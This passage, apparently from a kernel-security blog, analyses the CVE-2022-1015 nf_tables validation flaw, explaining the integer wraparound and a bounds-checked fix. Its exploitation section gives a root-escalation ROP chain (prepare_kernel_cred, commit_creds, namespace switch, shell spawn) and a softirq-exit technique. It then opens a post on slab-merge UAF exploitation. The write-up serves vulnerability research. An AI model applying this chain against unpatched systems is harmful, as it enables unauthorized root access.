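<p>For reg = 0x7fffffff and len = 16, reg * 4 is 0xfffffffc, and adding 16 wraps around to 12, which is below 80, so the enormous register index is accepted.</p>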
<p>To see which values reg can take, look at where nft_validate_register_load is called:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* net/netfilter/nf_tables_api.c */</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">nft_parse_register_load</span><span class="params">(<span class="keyword">const</span> struct nlattr *attr, u8 *sreg, u32 len)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> u32 reg; <span class="comment">// 4 byte register variable</span></span><br><span class="line"> <span class="keyword">int</span> err;</span><br><span class="line"></span><br><span class="line"> reg = nft_parse_register(attr); <span class="comment">// gets the register index from an attribute</span></span><br><span class="line"> err = nft_validate_register_load(reg, len); <span class="comment">// calls the validating function</span></span><br><span class="line"> <span class="keyword">if</span> (err < <span class="number">0</span>) <span class="comment">// validation failed: propagate the error</span></span><br><span class="line"> <span class="keyword">return</span> err;</span><br><span class="line"></span><br><span class="line"> *sreg = reg; <span class="comment">// store the index through sreg; sreg is a u8 *, so only the low 8 bits are kept</span></span><br><span class="line"> <span class="comment">// sreg = source register -> the register from which we read</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line">EXPORT_SYMBOL_GPL(nft_parse_register_load);</span><br></pre></td></tr></table></figure>
<p>reg comes from the netlink attribute attr: it is parsed by nft_parse_register and then passed to nft_validate_register_load.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* net/netfilter/nf_tables_api.c */</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * nft_parse_register - parse a register value from a netlink attribute</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * @attr: netlink attribute</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Parse and translate a register value from a netlink attribute.</span></span><br><span class="line"><span class="comment"> * Registers used to be 128 bit wide, these register numbers will be</span></span><br><span class="line"><span class="comment"> * mapped to the corresponding 32 bit register numbers.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">unsigned</span> <span class="keyword">int</span> <span 
class="title">nft_parse_register</span><span class="params">(<span class="keyword">const</span> struct nlattr *attr)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> reg;</span><br><span class="line"></span><br><span class="line"> <span class="comment">// from include/uapi/linux/netfilter/nf_tables.h</span></span><br><span class="line"> <span class="comment">// NFT_REG_SIZE = 16 (16 bytes)</span></span><br><span class="line"> <span class="comment">// NFT_REG32_SIZE = 4 (4 bytes)</span></span><br><span class="line"> reg = ntohl(nla_get_be32(attr));</span><br><span class="line"> <span class="keyword">switch</span> (reg) {</span><br><span class="line"> <span class="keyword">case</span> NFT_REG_VERDICT...NFT_REG_4:</span><br><span class="line"> <span class="keyword">return</span> reg * NFT_REG_SIZE / NFT_REG32_SIZE; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
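<p>nft_parse_register clearly does not restrict reg at all: for any value outside NFT_REG_VERDICT...NFT_REG_4 it falls into the default case and returns reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00, i.e. reg - 4.</p>
<p>Finally, the index that nft_parse_register_load stores through sreg (a u8, so only the low byte of reg survives) is used to index the local nft_regs variable in nft_do_chain, which results in an out-of-bounds access on the stack. Because both nft_validate_register_store and nft_validate_register_load are affected, the stack memory after nft_regs can be both read and written out of bounds.</p>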
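<p>Putting the three functions together shows how an out-of-range attribute survives validation. In the user-space sketch below, the register constants mirror the values of enum nft_registers in the UAPI header (NFT_REG_4 = 4, NFT_REG32_00 = 8, NFT_REG32_15 = 23); REGS_DATA_SIZE = 80 is an assumption, and parse_register_checked is a hypothetical bounds-checked variant for comparison, not the kernel's code. The attribute value 0x80000003 maps to reg = 0x7fffffff, passes the wrapped length check, and is truncated to sreg = 255, i.e. a byte offset of 1020 into an 80-byte register area.</p>

```c
#include <stdint.h>

#define NFT_REG_1        1
#define NFT_REG_4        4
#define NFT_REG32_00     8
#define NFT_REG32_15     23
#define NFT_REG_SIZE     16
#define NFT_REG32_SIZE   4
#define REGS_DATA_SIZE   80   /* assumed: 20 u32 slots in struct nft_regs */

/* Same mapping as the vulnerable nft_parse_register (attr already in host order). */
static uint32_t parse_register(uint32_t attr)
{
    if (attr <= NFT_REG_4)                       /* NFT_REG_VERDICT...NFT_REG_4 */
        return attr * NFT_REG_SIZE / NFT_REG32_SIZE;
    return attr + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;   /* attr - 4, unbounded */
}

static int validate_register_load(uint32_t reg, uint32_t len)
{
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE || len == 0)
        return -1;
    if (reg * NFT_REG32_SIZE + len > REGS_DATA_SIZE)   /* 32-bit wraparound */
        return -1;
    return 0;
}

/* Mirrors nft_parse_register_load: the validated u32 is stored into a u8. */
static int parse_register_load(uint32_t attr, uint8_t *sreg, uint32_t len)
{
    uint32_t reg = parse_register(attr);

    if (validate_register_load(reg, len) < 0)
        return -1;
    *sreg = (uint8_t)reg;                        /* only the low byte survives */
    return 0;
}

/* Hypothetical variant that accepts only the register names the UAPI defines. */
static int parse_register_checked(uint32_t attr, uint32_t *reg)
{
    if (attr <= NFT_REG_4)
        *reg = attr * NFT_REG_SIZE / NFT_REG32_SIZE;
    else if (attr >= NFT_REG32_00 && attr <= NFT_REG32_15)
        *reg = attr + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;
    else
        return -1;
    return 0;
}
```

<p>The checked variant rejects 0x80000003 before any length arithmetic happens, which is why restricting the accepted register numbers closes the hole.</p>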
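<h1 id="四、EXP思路"><a href="#四、EXP思路" class="headerlink" title="四、EXP思路"></a>4. Exploitation approach</h1><p>The exploit contains a lot of arithmetic for computing address offsets, all tied to this particular bug and a particular kernel image, so there is little value in discussing them here; this article covers only the general approach. For a closer look, see the exploit repositories:</p>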
<p>https://github.com/pqlx/CVE-2022-1015</p>
<p>https://github.com/ysanatomic/CVE-2022-1015</p>
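<p>Normally, a stack out-of-bounds write caused by memcpy or a similar function is hard to exploit because of the stack canary: the copy usually starts at some local variable, so reaching the return address necessarily overwrites the canary. This bug is exploitable because the start address of the out-of-bounds read or write is chosen through the supplied reg value, so the canary can be skipped and the overwrite can begin at an address after the canary and before the return address.</p>
<h2 id="4-1-泄露内核地址"><a href="#4-1-泄露内核地址" class="headerlink" title="4.1 泄露内核地址"></a>4.1 Leaking a kernel address</h2><p>First, use dynamic debugging to find kernel addresses stored on the stack. Then use the nft_bitwise expression to read that memory out of bounds into the in-bounds part of nft_regs. From there, nft_payload_set can copy the in-bounds register contents into the packet, and a user-space socket that receives the packet obtains the kernel address, which defeats KASLR.</p>
<h2 id="4-2-代码执行"><a href="#4-2-代码执行" class="headerlink" title="4.2 代码执行"></a>4.2 Code execution</h2><p>Use nft_payload to copy a ROP chain, sent inside a packet, into the in-bounds part of nft_regs, then use nft_bitwise to write it out of bounds over the return address. To avoid overwriting the canary, the start address must lie after the canary and before the return address.</p>
<p>The ROP chain is constructed as follows:</p>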
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> offset = <span class="number">0</span>;</span><br><span class="line"><span class="comment">// clearing interrupts</span></span><br><span class="line">payload[offset++] = kbase + cli_ret;</span><br><span class="line"></span><br><span class="line"><span class="comment">// preparing credentials</span></span><br><span class="line">payload[offset++] = kbase + pop_rdi_ret; </span><br><span class="line">payload[offset++] = <span class="number">0x0</span>; <span class="comment">// first argument of prepare_kernel_cred</span></span><br><span class="line">payload[offset++] = kbase + prepare_kernel_cred;</span><br><span class="line"></span><br><span class="line"><span class="comment">// committing credentials</span></span><br><span class="line">payload[offset++] = kbase + mov_rdi_rax_ret;</span><br><span class="line">payload[offset++] = kbase + commit_creds;</span><br><span class="line"></span><br><span class="line"><span 
class="comment">// switching namespaces</span></span><br><span class="line">payload[offset++] = kbase + pop_rdi_ret;</span><br><span class="line">payload[offset++] = process_id;</span><br><span class="line">payload[offset++] = kbase + find_task_by_vpid;</span><br><span class="line">payload[offset++] = kbase + mov_rdi_rax_ret;</span><br><span class="line">payload[offset++] = kbase + pop_rsi_ret;</span><br><span class="line">payload[offset++] = kbase + ini;</span><br><span class="line">payload[offset++] = kbase + switch_task_namespaces;</span><br><span class="line"></span><br><span class="line"><span class="comment">// returning to userland</span></span><br><span class="line">payload[offset++] = kbase + swapgs_restore_regs_and_return_to_usermode;</span><br><span class="line">payload[offset++] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)spawnShell;</span><br><span class="line">payload[offset++] = user_cs;</span><br><span class="line">payload[offset++] = user_rflags;</span><br><span class="line">payload[offset++] = user_sp;</span><br><span class="line">payload[offset++] = user_ss;</span><br></pre></td></tr></table></figure>
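<p>First, clear the interrupt flag (cli) to mask maskable interrupts, so that the ROP chain is not interrupted.</p>
<p>Next, call prepare_kernel_cred(0) to prepare a cred with root privileges. prepare_kernel_cred is the kernel function for preparing a process cred, the structure that describes a process's privileges; when it is passed 0 (NULL), it returns a cred with root privileges. commit_creds then installs this cred on the current process.</p>
<p>Then call switch_task_namespaces(find_task_by_vpid(process_id), &amp;init_nsproxy) to switch the exploit process's namespaces to init_nsproxy. Here process_id is the PID of the exploit process, which can be obtained and saved in user space in many ways; find_task_by_vpid returns the task_struct for the given PID; and init_nsproxy holds the namespaces of init, the first process. This step is needed because using nf_tables requires switching into new user and network namespaces. Alternatively, the switch can be done after returning to user space with root privileges.</p>
<p>Finally, return to user space through the swapgs; iret gadget (swapgs_restore_regs_and_return_to_usermode in the chain above). The values for the IP, CS, RFLAGS, SP and SS registers must be laid out on the stack in that order. IP points to a function that spawns a shell by calling system("/bin/sh").</p>
<h2 id="4-3-离开-softirq-上下文"><a href="#4-3-离开-softirq-上下文" class="headerlink" title="4.3 离开 softirq 上下文"></a>4.3 Leaving softirq context</h2><p>In the <a href="https://github.com/pqlx/CVE-2022-1015" target="_blank" rel="noopener">EXP</a> by the vulnerability's discoverer, the interrupt-clearing step from the previous section is followed by an extra step that leaves softirq context. It is there because, in the exploit author's environment, nft_do_chain is called in the context of a NET_RX_SOFTIRQ softirq. The step is not strictly necessary, but skipping it leaves the system unstable.</p>
<p>Softirq processing is entered through do_softirq, which runs __do_softirq on the IRQ stack via do_softirq_own_stack:</p>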
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Macro to invoke __do_softirq on the irq stack. This is only called from</span></span><br><span class="line"><span class="comment"> * task context when bottom halves are about to be reenabled and soft</span></span><br><span class="line"><span class="comment"> * interrupts are pending to be processed. 
The interrupt stack cannot be in</span></span><br><span class="line"><span class="comment"> * use here.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> do_softirq_own_stack() \</span></span><br><span class="line">{ \</span><br><span class="line"> __this_cpu_write(hardirq_stack_inuse, <span class="literal">true</span>); \</span><br><span class="line"> call_on_irqstack(__do_softirq, ASM_CALL_ARG0); \</span><br><span class="line"> __this_cpu_write(hardirq_stack_inuse, <span class="literal">false</span>); \</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">---</span><br><span class="line"></span><br><span class="line"><span class="function">asmlinkage __visible <span class="keyword">void</span> <span class="title">do_softirq</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __u32 pending;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> flags;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (in_interrupt())</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line"> local_irq_save(flags);</span><br><span class="line"></span><br><span class="line"> pending = local_softirq_pending();</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (pending && !ksoftirqd_running(pending))</span><br><span class="line"> do_softirq_own_stack();</span><br><span class="line"></span><br><span class="line"> local_irq_restore(flags);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">asmlinkage __visible <span class="keyword">void</span> __softirq_entry __do_softirq(<span class="keyword">void</span>)</span><br><span class="line">{</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="built_in">end</span> = jiffies + MAX_SOFTIRQ_TIME;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> old_flags = current->flags;</span><br><span class="line"> <span class="keyword">int</span> max_restart = MAX_SOFTIRQ_RESTART;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">softirq_action</span> *<span class="title">h</span>;</span></span><br><span class="line"> <span class="keyword">bool</span> in_hardirq;</span><br><span class="line"> __u32 pending;</span><br><span class="line"> <span class="keyword">int</span> softirq_bit;</span><br><span class="line"></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Mask out PF_MEMALLOC as the current task context is borrowed for the</span></span><br><span class="line"><span class="comment"> * softirq. 
A softirq handled, such as network RX, might set PF_MEMALLOC</span></span><br><span class="line"><span class="comment"> * again if the socket is related to swapping.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> current->flags &= ~PF_MEMALLOC;</span><br><span class="line"> pending = local_softirq_pending();</span><br><span class="line"></span><br><span class="line"> softirq_handle_begin();</span><br><span class="line"> in_hardirq = lockdep_softirq_start();</span><br><span class="line"> </span><br><span class="line"> account_softirq_enter(current);</span><br><span class="line"></span><br><span class="line"> restart:</span><br><span class="line"> <span class="comment">/* Reset the pending bitmask before enabling irqs */</span></span><br><span class="line"> set_softirq_pending(<span class="number">0</span>);</span><br><span class="line"> </span><br><span class="line"> local_irq_enable();</span><br><span class="line"></span><br><span class="line"> h = softirq_vec;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> ((softirq_bit = ffs(pending))) {</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> vec_nr;</span><br><span class="line"> <span class="keyword">int</span> prev_count;</span><br><span class="line"></span><br><span class="line"> h += softirq_bit - <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> vec_nr = h - softirq_vec;</span><br><span class="line"> prev_count = preempt_count();</span><br><span class="line"></span><br><span class="line"> kstat_incr_softirqs_this_cpu(vec_nr);</span><br><span class="line"></span><br><span class="line"> trace_softirq_entry(vec_nr);</span><br><span class="line"> h->action(h); <span class="comment">// <---------- net_rx_action is called here</span></span><br><span class="line"> trace_softirq_exit(vec_nr);</span><br><span class="line"> <span 
class="keyword">if</span> (unlikely(prev_count != preempt_count())) {</span><br><span class="line"> pr_err(<span class="string">"huh, entered softirq %u %s %p with preempt_count %08x, exited with %08x?\n"</span>,</span><br><span class="line"> vec_nr, softirq_to_name[vec_nr], h->action,</span><br><span class="line"> prev_count, preempt_count());</span><br><span class="line"> preempt_count_set(prev_count);</span><br><span class="line"> }</span><br><span class="line"> h++;</span><br><span class="line"> pending >>= softirq_bit;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!IS_ENABLED(CONFIG_PREEMPT_RT) &&</span><br><span class="line"> __this_cpu_read(ksoftirqd) == current)</span><br><span class="line"> rcu_softirq_qs();</span><br><span class="line"></span><br><span class="line"> local_irq_disable();</span><br><span class="line"></span><br><span class="line"> pending = local_softirq_pending();</span><br><span class="line"> <span class="keyword">if</span> (pending) {</span><br><span class="line"> <span class="keyword">if</span> (time_before(jiffies, <span class="built_in">end</span>) && !need_resched() &&</span><br><span class="line"> --max_restart)</span><br><span class="line"> <span class="keyword">goto</span> restart;</span><br><span class="line"></span><br><span class="line"> wakeup_softirqd();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> account_softirq_exit(current);</span><br><span class="line"> lockdep_softirq_end(in_hardirq);</span><br><span class="line"> softirq_handle_end();</span><br><span class="line"> current_restore_flags(old_flags, PF_MEMALLOC);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
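<p>Once the pending softirqs have been handled, __do_softirq() disables interrupts with local_irq_disable() and then adjusts preempt_count through softirq_handle_end(). Back in do_softirq(), the original system-call stack is restored by the do_softirq_own_stack macro, and interrupts are finally re-enabled.</p>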
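<p>Because softirq_handle_end() is inlined into __do_softirq(), the author of this <a href="https://github.com/pqlx/CVE-2022-1015" target="_blank" rel="noopener">exploit</a> simply uses ROP to redirect control flow to the point in __do_softirq() where softirq_handle_end() is called. That restores preempt_count, and according to the author it leaves softirq context without side effects and returns to process context.</p>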
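<p>To see why landing on softirq_handle_end() is enough to leave softirq context, it helps to look at the preempt_count arithmetic. The following is a minimal user-space model, not kernel code: the bit layout follows include/linux/preempt.h (8 preemption bits, then 8 softirq bits), while the counter variable and the <code>*_model</code> helpers are hypothetical stand-ins. It assumes, as described above, that softirq_handle_begin() adds SOFTIRQ_OFFSET and softirq_handle_end() subtracts it again; it does not model the stack switch or the interrupt state.</p>

```c
#include <assert.h>
#include <stdbool.h>

/* Bit layout of preempt_count, following include/linux/preempt.h. */
#define PREEMPT_BITS   8
#define SOFTIRQ_BITS   8
#define PREEMPT_SHIFT  0
#define SOFTIRQ_SHIFT  (PREEMPT_SHIFT + PREEMPT_BITS)
#define SOFTIRQ_OFFSET (1UL << SOFTIRQ_SHIFT)
#define SOFTIRQ_MASK   (((1UL << SOFTIRQ_BITS) - 1) << SOFTIRQ_SHIFT)

/* Hypothetical stand-in for the per-CPU preempt_count. */
static unsigned long preempt_count_model;

/* Mirrors in_serving_softirq(): softirq_count() & SOFTIRQ_OFFSET. */
static bool in_serving_softirq_model(void)
{
	return ((preempt_count_model & SOFTIRQ_MASK) & SOFTIRQ_OFFSET) != 0;
}

/* Models softirq_handle_begin(): mark "currently serving a softirq". */
static void softirq_handle_begin_model(void)
{
	preempt_count_model += SOFTIRQ_OFFSET;
}

/* Models softirq_handle_end(): drop the mark set by the begin helper. */
static void softirq_handle_end_model(void)
{
	/* Must not underflow the softirq field. */
	assert((preempt_count_model & SOFTIRQ_MASK) >= SOFTIRQ_OFFSET);
	preempt_count_model -= SOFTIRQ_OFFSET;
}
```

<p>In this model the counter goes from 0 to 0x100 while a softirq is being served and back to 0 after softirq_handle_end_model(), at which point in_serving_softirq_model() reports false again. That is the state the exploit described above aims to reach before resuming in process context.</p>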
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/" target="_blank" rel="noopener">How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables</a></p>
<p><a href="https://ysanatomic.github.io/cve-2022-1015/" target="_blank" rel="noopener">CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation</a></p>
<p><a href="https://ysanatomic.github.io/netfilter_nf_tables/" target="_blank" rel="noopener">Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables</a></p>
<p><a href="https://www.digitalocean.com/community/tutorials/a-deep-dive-into-iptables-and-netfilter-architecture" target="_blank" rel="noopener">A Deep Dive into Iptables and Netfilter Architecture</a></p>
<p><a href="https://arthurchiao.art/blog/conntrack-design-and-implementation/" target="_blank" rel="noopener">Connection Tracking (conntrack): Design and Implementation Inside Linux Kernel</a></p>
<p><a href="https://www.kernel.org/doc/html/latest/userspace-api/netlink/intro.html" target="_blank" rel="noopener">Introduction to Netlink — The Linux Kernel documentation</a></p>
<p><a href="https://man7.org/linux/man-pages/man7/netlink.7.html" target="_blank" rel="noopener">netlink(7) - Linux manual page</a></p>
<p><a href="https://wiki.nftables.org/wiki-nftables/index.php/Portal:DeveloperDocs/nftables_internals" target="_blank" rel="noopener">Portal:DeveloperDocs/nftables internals - nftables wiki</a></p>
</div>
<footer class="article-footer">
<a data-url="http://yoursite.com/2023/02/06/cve-2022-1015/" data-id="cmd5slr2k000m0lo18hacf0ae" class="article-share-link">Share</a>
</footer>
</div>
</article>
<article id="post-2023/02/01/slabUaf-to-pageUaf" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2023/02/01/slabUaf-to-pageUaf/" class="article-date">
<time datetime="2023-02-01T14:00:00.000Z" itemprop="datePublished">2023-02-01</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2023/02/01/slabUaf-to-pageUaf/">Linux 内核利用技巧 Slab UAF to Page UAF</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>author: 熊潇 of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a></p>
<p>This article examines how the kernel build option <code>CONFIG_SLAB_MERGE_DEFAULT</code> affects <code>kmem_cache</code> allocation, and presents one approach to exploiting a slab UAF when that option is enabled (<a href="https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/" target="_blank" rel="noopener">source of the approach</a>; everything here is based on Linux-5.10.90).</p>
<p>Readers should have a basic understanding of slab/SLUB and the buddy system.</p>
<ul>
<li>Part. 1: Source code analysis</li>
<li>Part. 2: Comparison test with and without <code>CONFIG_SLAB_MERGE_DEFAULT</code></li>
<li>Part. 3: A cross-slab UAF exploitation example</li>
</ul>
<p>Keyword: slab/slub | CONFIG_SLAB_MERGE_DEFAULT | Linux kernel exploit</p>
<h2 id="Part-1"><a href="#Part-1" class="headerlink" title="Part. 1"></a>Part. 1</h2><p>创建 <code>struct kmem_cache</code> 的时候,有两种情况:</p>
<ul>
<li><code>__kmem_cache_alias</code>: reuse (merge with) an existing cache</li>
<li><code>create_cache</code>: create a new cache</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">kmem_cache_create(..)</span><br><span class="line"> kmem_cache_create_usercopy(..)</span><br><span class="line"> <span class="keyword">if</span> (!usersize) <span class="comment">// usersize == 0</span></span><br><span class="line"> s = __kmem_cache_alias(name, <span class="built_in">size</span>, align, flags, ctor); <span class="comment">// s 为 NULL 才会创建新的 slab</span></span><br><span class="line"> <span class="keyword">if</span> (s)</span><br><span class="line"> <span class="keyword">goto</span> out_unlock;</span><br><span class="line"> create_cache()</span><br><span class="line"></span><br><span class="line"><span class="comment">// 进入 `__kmem_cache_alias` 看看</span></span><br><span 
class="line">__kmem_cache_alias(..)</span><br><span class="line"> <span class="comment">// 检查 CONFIG_SLAB_MERGE_DEFAULT 配置;</span></span><br><span class="line"> <span class="comment">// 如果开启了,则通过 sysfs_slab_alias 找到已经创建的相同大小的 slab 作为替代</span></span><br><span class="line"> s = find_mergeable(..)</span><br><span class="line"> list_for_each_entry_reverse(s, &slab_caches, <span class="built_in">list</span>) {</span><br><span class="line"> <span class="keyword">if</span> (slab_unmergeable(s)) <span class="comment">// slab_nomerge 为 true 时 return 1;</span></span><br><span class="line"> <span class="keyword">continue</span>; </span><br><span class="line"> ...</span><br><span class="line"> <span class="keyword">return</span> s;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">NULL</span>; <span class="comment">// slab_nomerge 为 true 的时候返回 NULL</span></span><br><span class="line"> <span class="keyword">if</span>(s) </span><br><span class="line"> ... 
</span><br><span class="line"> sysfs_slab_alias(..)</span><br><span class="line"> <span class="keyword">return</span> s;</span><br><span class="line"></span><br><span class="line"><span class="comment">// CONFIG_SLAB_MERGE_DEFAULT=y -> slab_nomerge == false</span></span><br><span class="line"><span class="comment">// CONFIG_SLAB_MERGE_DEFAULT=n -> slab_nomerge == true</span></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">bool</span> slab_nomerge = !IS_ENABLED(CONFIG_SLAB_MERGE_DEFAULT);</span><br><span class="line"></span><br><span class="line"><span class="comment">// https://cateee.net/lkddb/web-lkddb/SLAB_MERGE_DEFAULT.html</span></span><br><span class="line"><span class="comment">// CONFIG_SLAB_MERGE_DEFAULT: Allow slab caches to be merged</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// For reduced kernel memory fragmentation, slab caches can be merged </span></span><br><span class="line"><span class="comment">// when they share the same size and other characteristics. </span></span><br><span class="line"><span class="comment">// This carries a risk of kernel heap overflows being able to </span></span><br><span class="line"><span class="comment">// overwrite objects from merged caches (and more easily control cache layout), </span></span><br><span class="line"><span class="comment">// which makes such heap attacks easier to exploit by attackers.</span></span><br></pre></td></tr></table></figure>
